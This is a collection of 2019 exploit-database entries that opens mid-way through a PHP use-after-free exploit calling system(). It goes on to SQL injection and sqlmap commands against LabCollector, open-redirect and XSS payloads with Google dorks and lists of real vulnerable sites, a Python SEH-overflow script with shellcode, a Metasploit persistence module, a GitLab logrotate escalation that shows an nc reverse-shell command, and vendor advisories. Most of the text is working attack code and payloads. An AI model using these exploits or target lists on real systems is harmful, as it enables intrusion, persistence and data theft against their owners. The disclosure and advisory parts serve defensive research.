                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $text_size) {
                $deref = leak($leak);
                # 'bin2hex' constant check
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) { # ELF header
                return $addr;
            }
        }
    }

    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) { # system
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    class ryat {
        var $ryat;
        var $chtg;

        function __destruct()
        {
            $this->chtg = $this->ryat;
            $this->ryat = 1;
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; # increase this value if you get segfaults

    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_repeat('A', 79);

    $poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';
    $out = unserialize($poc);
    gc_collect_cycles();

    $v = [];
    $v[0] = ptr2str(0, 79);
    unset($v);
    $abc = $out[2][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79) {
        die("UAF failed");
    }

    # leaks
    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    # fake value
    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    # fake reference
    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }

    # fake closure object
    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    # pwn
    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); # internal func type
    write($abc, 0xd0 + 0x68, $zif_system); # internal func handler

    ($helper->b)($cmd);

    exit();
}

# Exploit Title: LabCollector (Laboratory Information System) 5.423 - Multiples SQL Injection
# Date: 09/09/2019
# Software Links/Project: https://www.labcollector.com/clientarea/downloads.php
# Version: LabCollector (Laboratory Information System) 5.423
# Exploit Author: Carlos Avila
# Category: webapps
# Tested on: Debian 9 / Win10
# Contact: http://twitter.com/badboy_nt

1. Description

LabCollector Lab Services Manager (LSM) is a network based application that helps laboratories, core facilities, biotechs providing services to clients or partners to keep track of samples arriving for processing, track status and generate reports. Billing management is also possible. LSM is a simple and complete lab services LIMS software. Totally configurable by the user, it can be adapted to any situation. 

This allows unauthenticated remote attacker to execute arbitrary SQL commands and obtain private information. Admin or users valid credentials aren't required. In a deeper analysis other pages are also affected with the vulnerability over others inputs.

It written in PHP it is vulnerable to SQL Injection on multiples occurrences. The parameters affected are detailed below:

http://192.168.0.102/labcollector/html/login.php [parameters affected via POST method: login]
http://192.168.0.102/labcollector/html/retrieve_password.php (parameters affected via POST method: user_name)



2. Proof of Concept


----------------------------------------------------------------------------------------------------------------------------------
Post Request:

POST /labcollector/html/login.php HTTP/1.1
Host: 192.168.0.102
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
DNT: 1
Connection: close
Referer: http://192.168.0.102/labcollector/html/login.php
Cookie: PHPSESSID=cio2kpq89f4da0b1fhakfn68k7
Upgrade-Insecure-Requests: 1

login=test&pass=hola&action=login&Submit=Sign+In

----------------------------------------------------------------------------------------------------------------------------------

All tests have been performed in a controlled and local environment.

sunday:sqlmap badboy_nt$ python sqlmap.py -r SQLI-LabCollectorLogin --random-agent --tamper randomcase -p login --dbms mysql --dbs




sunday:sqlmap badboy_nt$ python sqlmap.py -r SQLI-LabCollectorLogin2 --random-agent --tamper randomcase -p user_name --dbms mysql -f



3. Solution:

Application inputs must be validated correctly throughout the development of the project.

####################################################################

# Exploit Title : ParantezTeknoloji Library Software 16.0519000 Open Redirection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 04/10/2019
# Vendor Homepage : parantezteknoloji.com.tr
# Software Affected Versions and Download Links : 
Koha 3.2000000
download.koha-community.org/old_releases/koha-3.20.00.tar.gz
Koha 16.0519000
download.koha-community.org/old_releases/koha-16.05.19.tar.gz
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : Parantez Teknoloji inurl:/cgi-bin/koha/ site:tr
# Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
ParantezTeknoloji Library Software accepts a user-controlled input that specifies
a link to an external site, and uses that link in a Redirect. This simplifies phishing 
attacks. An http parameter may contain a URL value and could cause the web 
application to redirect the request to the specified URL. By modifying the URL 
value to a malicious site, an attacker may successfully launch a phishing scam and 
steal user credentials. Because the server name in the modified link is identical to the 
original site, phishing attempts have a more trustworthy appearance. Open redirect is a 
failure in that process that makes it possible for attackers to steer users to malicious 
websites. This vulnerability is used in phishing attacks to get users to visit malicious 
sites without realizing it. Web users often encounter redirection when they visit the 
Web site of a company whose name has been changed or which has been acquired by 
another company. Visiting unreal web page user's computer becomes affected 
by malware the task of which is to deceive the valid actor and steal his personal data.

####################################################################

# Vulnerable File :
*****************
/tracklinks.pl

# Vulnerable Parameters :
***********************
?uri=//

?biblionumber=[ID-NUMBER]&uri=//

# Open Redirection Exploit :
**************************
/cgi-bin/koha/tracklinks.pl?uri=//[REDIRECT-ADDRESS-HERE].gov

/cgi-bin/koha/tracklinks.pl?biblionumber=[ID-NUMBER]&uri=//[REDIRECT-ADDRESS-HERE].gov

####################################################################

# Example Vulnerable Sites :
*************************
[+] 94.55.127.94/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

[+] kutuphane.jaletezer.k12.tr/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

####################################################################

# Exploit Title : Devinim Library Software 19.0504000 Open Redirection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 04/10/2019
# Vendor Homepage : devinim.com.tr
# Software Affected Versions and Download Links : 
Koha 16.1104000
download.koha-community.org/old_releases/koha-16.11.04.tar.gz
Koha 18.0503000
download.koha-community.org/old_releases/koha-18.05.03.tar.gz
Koha 18.0504000
download.koha-community.org/old_releases/koha-18.05.04.tar.gz
Koha 19.0504000
download.koha-community.org/koha-19.05.04.tar.gz
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Bu yazýlým Devinim Yazýlým Eðitim Danýþmanlýk tarafýndan geliþtirilip kurulmuþtur.
# Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
Devinim Software accepts a user-controlled input that specifies
a link to an external site, and uses that link in a Redirect. This simplifies phishing 
attacks. An http parameter may contain a URL value and could cause the web 
application to redirect the request to the specified URL. By modifying the URL 
value to a malicious site, an attacker may successfully launch a phishing scam and 
steal user credentials. Because the server name in the modified link is identical to the 
original site, phishing attempts have a more trustworthy appearance. Open redirect is a 
failure in that process that makes it possible for attackers to steer users to malicious 
websites. This vulnerability is used in phishing attacks to get users to visit malicious 
sites without realizing it. Web users often encounter redirection when they visit the 
Web site of a company whose name has been changed or which has been acquired by 
another company. Visiting unreal web page user's computer becomes affected 
by malware the task of which is to deceive the valid actor and steal his personal data.

####################################################################

# Vulnerable File :
*****************
/tracklinks.pl

# Vulnerable Parameters :
***********************
?uri=//

?biblionumber=[ID-NUMBER]&uri=//

# Open Redirection Exploit :
**************************
/cgi-bin/koha/tracklinks.pl?uri=//[REDIRECT-ADDRESS-HERE].gov

/cgi-bin/koha/tracklinks.pl?biblionumber=[ID-NUMBER]&uri=//[REDIRECT-ADDRESS-HERE].gov

####################################################################

# Example Vulnerable Sites :
*************************
[+] koha.devinim.com.tr/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

[+] imrenahmettuzunkutuphanesi.org/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

[+] ekatalog.nevsehir.edu.tr/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

[+] katalogtarama.cekulvakfi.org.tr/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

[+] boratavkutuphane.kulturturizm.gov.tr/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

[+] koha.gidatarim.edu.tr/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

[+] kutuphane.pendik.bel.tr/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

import socket
from struct import *

# Exploit Title: File sharing wizard 'DELETE' remote SEH overflow
# Date: 10/4/2019
# Exploit Author: Striker
# Vendor Homepage: https://file-sharing-wizard.soft112.com/
# Version: 1.5.0 Build on 26-8-2008
# Tested on: Windows 7


# File-sharing-wizard-seh

host = "10.0.2.7"
port = 80

#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed -f python

buf =  b""
buf += b"\x89\xe7\xd9\xc2\xd9\x77\xf4\x58\x50\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x7a\x48\x6b"
buf += b"\x32\x55\x50\x53\x30\x57\x70\x43\x50\x4f\x79\x6a\x45"
buf += b"\x50\x31\x79\x50\x33\x54\x4e\x6b\x66\x30\x54\x70\x6c"
buf += b"\x4b\x71\x42\x34\x4c\x6e\x6b\x70\x52\x64\x54\x6c\x4b"
buf += b"\x34\x32\x67\x58\x66\x6f\x58\x37\x70\x4a\x77\x56\x46"
buf += b"\x51\x4b\x4f\x6e\x4c\x47\x4c\x31\x71\x61\x6c\x46\x62"
buf += b"\x76\x4c\x67\x50\x7a\x61\x38\x4f\x64\x4d\x37\x71\x68"
buf += b"\x47\x49\x72\x4c\x32\x70\x52\x61\x47\x6e\x6b\x73\x62"
buf += b"\x72\x30\x6c\x4b\x31\x5a\x45\x6c\x6e\x6b\x72\x6c\x34"
buf += b"\x51\x71\x68\x4b\x53\x61\x58\x53\x31\x78\x51\x52\x71"
buf += b"\x4e\x6b\x50\x59\x75\x70\x53\x31\x7a\x73\x4e\x6b\x57"
buf += b"\x39\x75\x48\x6a\x43\x74\x7a\x67\x39\x4e\x6b\x76\x54"
buf += b"\x4e\x6b\x63\x31\x59\x46\x56\x51\x59\x6f\x4c\x6c\x49"
buf += b"\x51\x78\x4f\x34\x4d\x33\x31\x58\x47\x50\x38\x39\x70"
buf += b"\x32\x55\x79\x66\x37\x73\x33\x4d\x68\x78\x67\x4b\x63"
buf += b"\x4d\x57\x54\x70\x75\x6b\x54\x46\x38\x4c\x4b\x73\x68"
buf += b"\x47\x54\x56\x61\x79\x43\x35\x36\x4e\x6b\x56\x6c\x72"
buf += b"\x6b\x6c\x4b\x31\x48\x47\x6c\x36\x61\x6e\x33\x4c\x4b"
buf += b"\x75\x54\x6c\x4b\x37\x71\x5a\x70\x6d\x59\x50\x44\x34"
buf += b"\x64\x55\x74\x33\x6b\x43\x6b\x70\x61\x31\x49\x53\x6a"
buf += b"\x73\x61\x49\x6f\x79\x70\x53\x6f\x61\x4f\x51\x4a\x6c"
buf += b"\x4b\x77\x62\x7a\x4b\x4e\x6d\x31\x4d\x53\x5a\x65\x51"
buf += b"\x4c\x4d\x6c\x45\x48\x32\x35\x50\x57\x70\x47\x70\x70"
buf += b"\x50\x45\x38\x45\x61\x4e\x6b\x62\x4f\x4c\x47\x6b\x4f"
buf += b"\x7a\x75\x6d\x6b\x4c\x30\x68\x35\x4d\x72\x46\x36\x50"
buf += b"\x68\x39\x36\x4d\x45\x4f\x4d\x4d\x4d\x6b\x4f\x78\x55"
buf += b"\x77\x4c\x45\x56\x51\x6c\x56\x6a\x6f\x70\x49\x6b\x4d"
buf += b"\x30\x50\x75\x46\x65\x4d\x6b\x33\x77\x66\x73\x53\x42"
buf += b"\x62\x4f\x43\x5a\x75\x50\x53\x63\x39\x6f\x4e\x35\x62"
buf += b"\x43\x53\x51\x62\x4c\x63\x53\x76\x4e\x35\x35\x61\x68"
buf += b"\x62\x45\x33\x30\x41\x41"

payload = "DELETE "
payload += "A" * 1040 # junk
payload += "\x90\x90\xeb\x16" # JMP short over SEH
payload += "\xb5\xbb\x37\x7c" # POP POP RET
# 0x7c37bbb5 : pop ecx # pop ecx # ret 0x08 |  {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files\File Sharing Wizard\bin\MSVCR71.dll)
payload += "\x90" * 50 # NOP
payload += buf # shellcode
payload += "D" *(5000 - len(payload))
payload += " HTTP/1.1\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(payload)
s.close()

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/file'
require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Windows::Registry
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Windows Silent Process Exit Persistence',
'Description'    => %q(
      Windows allows you to set up a debug process when a process exits.
      This module uploads a payload and declares that it is the debug
      process to launch when a specified process exits.
      ),
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Mithun Shanbhag', # earliest author found
'bwatters-r7', # msf module
        ],
'Platform'       => [ 'win' ],
'SessionTypes'   => [ 'meterpreter', 'shell' ],
'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
'DefaultTarget'  => 0,
'DisclosureDate' => "Jun 28 2008",
'References'     =>
        [
          ['URL', 'https://attack.mitre.org/techniques/T1183/'],
          ['URL', 'https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/']
        ],
'DefaultOptions' =>
        {
'DisablePayloadHandler' => 'true'
        }
    ))
    register_options([
      OptString.new('PAYLOAD_NAME',
                    [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
      OptString.new('PATH', [false, 'Path to write payload(%TEMP% by default).', nil]),
      OptString.new('IMAGE_FILE', [true, 'Binary to "debug"', nil])

    ])
  end

  def upload_payload(dest_pathname)
    payload_exe = generate_payload_exe
    write_file(dest_pathname, payload_exe)
    vprint_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{dest_pathname}")
  end

  def validate_active_host
    unless is_system?
      fail_with(Failure::NoAccess, "You must be System to run this Module")
    end

    begin
      print_status("Attempting Persistence on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
    rescue Rex::Post::Meterpreter::RequestError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
      raise Msf::Exploit::Failed, 'Could not connect to session'
    end
  end

  def write_reg_keys(image_file, payload_pathname)
    reg_keys = []
    reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{image_file}",
                  value_name: "GlobalFlag",
                  type: "REG_DWORD",
                  value_value: 512)
    reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}",
                   value_name: "ReportingMode",
                   type: "REG_DWORD",
                   value_value: 1)
    reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}",
                   value_name: "MonitorProcess",
                   type: "REG_SZ",
                   value_value: payload_pathname)
    silent_process_exit_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit"
    registry_createkey(silent_process_exit_key) unless registry_key_exist?(silent_process_exit_key)
    reg_keys.each do |key|
      registry_createkey(key[:key_name]) unless registry_key_exist?(key[:key_name])
      vprint_status("Writing #{key[:value_name]} to #{key[:key_name]}")
      registry_setvaldata(key[:key_name], key[:value_name], key[:value_value], key[:type])
      unless registry_getvalinfo(key[:key_name], key[:value_name])
        print_error("Failed to set #{key[:value_name]} for #{key[:key_name]}")
        return false
      end
    end
  end

  def exploit
    validate_active_host
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
    temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
    image_file = datastore['IMAGE_FILE']
    payload_pathname = temp_path + "\\" + payload_name + '.exe'
    vprint_status("Payload pathname = #{payload_pathname}")
    upload_payload(payload_pathname) if write_reg_keys(image_file, payload_pathname)
  end
end

Signal: Incoming call can be connected without user interaction

There is a logic error in Signal that can cause an incoming call to be answered even if the callee does not pick it up.

In the Android client, there is a method handleCallConnected that causes the call to finish connecting. During normal use, it is called in two situations: when callee device accepts the call when the user selects 'accept', and when the caller device receives an incoming \"connect\" message indicating that the callee has accepted the call. Using a modified client, it is possible to send the \"connect\" message to a callee device when an incoming call is in progress, but has not yet been accepted by the user. This causes the call to be answered, even though the user has not interacted with the device. The connected call will only be an audio call, as the user needs to manually enable video in all calls. The iOS client has a similar logical problem, but the call is not completed due to an error in the UI caused by the unexpected sequence of states. I would recommend improving the logic in both clients, as it is possible the UI problem doesn't occur in all situations.

To reproduce this problem on the Android client, replace the method handleSetMuteAudio in the file WebRtcCallService.java with the following method. 

  private void handleSetMuteAudio(Intent intent) {

    Log.e(TAG, \"SENDING MESSAGE\");

    this.dataChannel.send(new DataChannel.Buffer(ByteBuffer.wrap(Data.newBuilder().setConnected(Connected.newBuilder().setId(this.callId)).build().toByteArray()), false));

     intent.putExtra(EXTRA_CALL_ID, this.callId);
     intent.putExtra(EXTRA_REMOTE_ADDRESS, recipient.getAddress());
     handleCallConnected(intent);
  }

Then build the client and install it and make a call. When the call is ringing, the audio mute button can be pressed to force the callee device to connect, and audio from the callee device will be audible. 

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.





Found by: natashenka@google.com

# Privilege Escalation via Logrotate in Gitlab Omnibus 

## Overview
Identifier: AIT-SA-20190930-01
Target: GitLab Omnibus
Vendor: GitLab
Version: 7.4 through 12.2.1
Fixed in Version: 12.2.3, 12.1.8 and 12.0.8
CVE: CVE-2019-15741
Accessibility: Local
Severity: Low
Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)


## Summary
Omnibus GitLab is a way to package different services and tools required to run GitLab, so that most users can install it without laborious configuration.


## Vulnerability Description
GitLab Omnibus sets the ownership of the log directory to the system-user "git", which might let local users obtain root access because of unsafe 
interaction with logrotate.

User “git” owns the log directory /var/log/gitlab:

```
# logdir in gitlab-ee: 
drwxr-xr-x 19 git root 4096 May 12 18:43 /var/log/gitlab/
```

Log files rotate once a day (or any other frequency if configured) by logrotate as user root. The configuration does not use the “su” directive:
```
# logrotate-config of gitlab-ee: 
/var/log/gitlab/gitlab-workhorse/*.log { 
  hourly 
  rotate 30 
  compress 
  copytruncate 
  missingok 
  postrotate 
  endscript 
}
```

Due to logrotate is prone to a race-condition it is possible for user "git" to replace the
directory /var/log/gitlab/gitlab-workhorse/ with a symbolic link to any
directory(for example /etc/bash_completion.d). Logrotate will place
files as user “root” into /etc/bash_completition.d and set the owner of the file to "git".
An attacker could simply place a reverse-shell into this file. As soon as root logs in, a reverse
root-shell will be executed.

Details of the race-condition in logrotate can be found at:
* https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
* https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
* https://github.com/whotwagner/logrotten

## Proof of Concept
The following example illustrates how an attacker who already gained a shell as user “git”, can elevate his privileges to “root”. After downloading and compiling, 
the exploit gets executed and waits until the next daily run of logrotate. If the rotation of the log file succeeds, a new file that contains the reverse shell 
payload, will be written into /etc/bash_completition.d/ with owner “git”. As soon as root logs in, the reverse shell gets executed and opens a shell on the 
attackers netcat listener:

```
git@Stretch64:~$ git clone https://github.com/whotwagner/logrotten.git 
/tmp/logrotten
Cloning into '/tmp/logrotten'...
remote: Enumerating objects: 84, done.
remote: Counting objects: 100% (84/84), done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 84 (delta 35), reused 64 (delta 24), pack-reused 0
Unpacking objects: 100% (84/84), done.
git@Stretch64:~$ cd /tmp/logrotten && gcc -o logrotten logrotten.c
git@Stretch64:/tmp/logrotten$ ./logrotten -c /var/log/gitlab/gitlab-
workhorse/something.log
Waiting for rotating /var/log/gitlab/gitlab-workhorse/something.log...
Renamed /var/log/gitlab/gitlab-workhorse with /var/log/gitlab/gitlab-workhorse2 
and created symlink to /etc/bash_completion.d
Done!
git@Stretch64:/tmp/logrotten$ ls -l /etc/bash_completion.d/
total 20
-rw-r--r-- 1 root root   439 Sep 28  2018 git-prompt
-rw-r--r-- 1 root root 11144 Oct 28  2018 grub
-rw-r--r-- 1 git  git     33 May 12 18:44 something.log.1.gz
git@Stretch64:/tmp/logrotten$ echo  "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e 
/bin/bash localhost 3333 &); fi"> /etc/bash_completion.d/something.log.1.gz
git@Stretch64:/tmp/logrotten$ nc -nvlp 3333
listening on [any] 3333 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55526
id
uid=0(root) gid=0(root) groups=0(root)
ls -la
total 32
drwx------  4 root root 4096 May 12 18:47 .
drwxr-xr-x 22 root root 4096 Apr 25 18:31 ..
-rw-------  1 root root 1405 May 12 19:59 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  3 root root 4096 May 12 18:47 .config
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Apr 25 18:40 .ssh
-rw-------  1 root root 2194 May 12 17:29 .viminfo
```

## Vulnerable Versions
7.4 through 12.2.1

## Impact
An attacker who already achieved a valid shell as user “git” could elevate the privileges to “root”. The fact that another exploit is 
needed to get a shell lowers the severity from high to low.

## Solution
Update to GitLab Security Release: 12.2.3, 12.1.8, and 12.0.8

## References:
* https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/
* https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380
* https://hackerone.com/reports/578119

## Vendor Contact Timeline

* `2019-05-12` Contacting vendor through HackerOne 
* `2019-05-31` GitLab acknowledges the vulnerability 
* `2019-08-22` Notification from GitLab about the release that includes a patch 
* `2019-08-30` GitLab changed the severity from high to low and released an update that fixed the problem 
* `2019-09-30` Public disclosure  

## Advisory URL
http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

CA20190930-01: Security Notice for CA Network Flow Analysis

Issued: September 30th, 2019

CA Technologies, a Broadcom Company, is alerting customers to a
potential risk with CA Network Flow Analysis. A vulnerability exists
that can allow a remote attacker to execute arbitrary commands. CA
published a solution to address the vulnerabilities and recommends
that all affected customers implement this solution.

The vulnerability, CVE-2019-13658, occurs due to default credentials
and a configuration weakness. A malicious actor may use the default
credentials and exploit a weakness in the configuration to execute
arbitrary commands on the CA Network Flow Analysis server.

Risk Rating

High

Platform(s)

All supported platforms

Affected Products

CA Network Flow Analysis 10.0.x
CA Network Flow Analysis 9.x

How to determine if the installation is affected

Customers may use the product version to determine if their product
installation is affected.

Solution

The following solution is available to address the vulnerability.
Note that the typical deployment of CA Network Flow Analysis is in an
internal network and system administrators should restrict access to
sensitive ports (see Firewall Configuration) on the CA Network Flow
Analysis server.

CA Network Flow Analysis 9.x and 10.0.x:
Customers should update to CA Network Flow Analysis 10.0.2 or later
and change the MySQL passwords as described at Configure MySQL User
Password.

References

CVE-2019-13658 - CA Network Flow Analysis default credentials

Acknowledgement

CVE-2019-13658 - Hendrik Van Belleghem

Change History

Version 1.0: 2019-09-30 - Initial Release

CA customers may receive product alerts and advisories by subscribing
to Proactive Notifications on the support site.

Customers who require additional information about this notice may
contact CA Technologies Support at https://casupport.broadcom.com/

To report a suspected vulnerability in a CA Technologies product,
please send a summary to CA Technologies Product Vulnerability
Response at ca.psirt <AT> broadcom.com

Security Notices, PGP key, and disclosure policy and guidance
www.ca.com/us/support/ca-support-online/documents.aspx?id=177782

Kevin Kotas
CA Product Security Incident Response Team

Copyright 2019 Broadcom. All Rights Reserved. The term "Broadcom"
refers to Broadcom Inc. and/or its subsidiaries. Broadcom, the pulse
logo, Connecting everything, CA Technologies and the CA technologies
logo are among the trademarks of Broadcom. All trademarks, trade
names, service marks and logos referenced herein belong to their
respective companies.

-----BEGIN PGP SIGNATURE-----
Charset: utf-8

wsBVAwUBXZPob7Z6yOO9o8STAQhMrgf9HCSLc6uH4otJkEQIGNvVeNWaPDWTP9dm
ujWAXvnUJuL7lxzwEr31AAInxGHTi2dglMHoz7lBJ5KR7PCkTGImic1Oez+CyDt1
Pdu3KU/q4ZMRlek3BQZIwyDtCpa1v7jvd6YVAFACOKjK40abTaq5V7kKyRn33QWE
QG4wNiMj2Rh10v5wss00RxPHDO7OXFh8C1lXZMW7bFZ0XvpDml4jyOIsZ2vEodbA
JyFBJN970Ibea32wP0DhhDtW4A84q0V/6ZFlZboLoysuOHWJ65CNJH5waNkvjOyj
YsL1Vt+ou5O7VMY7mPjrh4IwJXdKSYZy+Vg9NcTAvDpzEnjH9ioGbA==
=zr/3
-----END PGP SIGNATURE-----

###################################################################

# Exploit Title : Thailand Union Library Management 6.2 Cross Site Scripting SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 07/10/2019
# Vendor Homepage : ulibm.net - 202.29.234.1/ULIB/index.php
# Software Affected Versions : 6 and 6.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : 
inurl:/ULIB/about.php site:ac.th
inurl:/searching.php?SUBJECT= site:ac.th
ULIB inurl:/searching.php?SUBJECT= site:ac.th
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-79 [ Improper Neutralization of Input During 
Web Page Generation ('Cross-site Scripting') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Thailand Union Library Management 6.2 is prone to an SQL-injection 
vulnerability because it fails to sufficiently sanitize user-supplied data before using 
it in an SQL query. Exploiting this issue could allow an attacker to compromise the 
application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

Reflected XSS (or Non-Persistent) :
***************************************
The server reads data directly from the HTTP request and reflects it back in the HTTP response. 
Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
 to a vulnerable web application, which is then reflected back to the victim and executed by the 
web browser. The most common mechanism for delivering malicious content is to include 
it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. 
URLs constructed in this manner constitute the core of many phishing schemes, whereby 
an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects 
the attacker's content back to the victim,the content is executed by the victim's browser.

###################################################################

# SQL Injection Exploit :
**********************
/ULIB/searching.php?MSUBJECT=[SQL Injection]

/PATH-HERE/searching.php?MSUBJECT=[SQL Injection]

# Cross Site Scripting XSS Exploit :
********************************
/ULIB/searching.php?MSUBJECT=1%27%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked.By.KingSkrupellos%3C/font%3E%3C/marquee%3E

###################################################################

# Example Vulnerable Sites :
*************************
[+] 202.29.234.1/ULIB/searching.php?MSUBJECT=1%27

